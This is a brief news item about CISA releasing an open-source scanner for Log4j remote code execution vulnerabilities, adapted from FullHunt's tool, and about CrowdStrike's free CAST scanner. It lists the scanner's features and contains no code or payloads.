The US Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of an open-source scanner for identifying web services impacted by Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.
CISA said it modified a Log4j scanner created by security company FullHunt, with the help of other researchers like Philipp Klaus, Andrei Fokau, and Moritz Bechler.
This Log4j scanner provided by CISO implements the following features:
- Support for lists of URLs
- Support for DNS callback for vulnerability discovery and validation
- Fuzzing for more than 60 HTTP request headers
- Fuzzing for HTTP POST Data parameters
- Fuzzing for JSON data parameters
- WAF Bypass payloads
Similarly, US cybersecurity company CrowdStrike released its own free Log4j scanner called the CrowdStrike Archive Scan Tool, or “CAST”.
Read more about it here.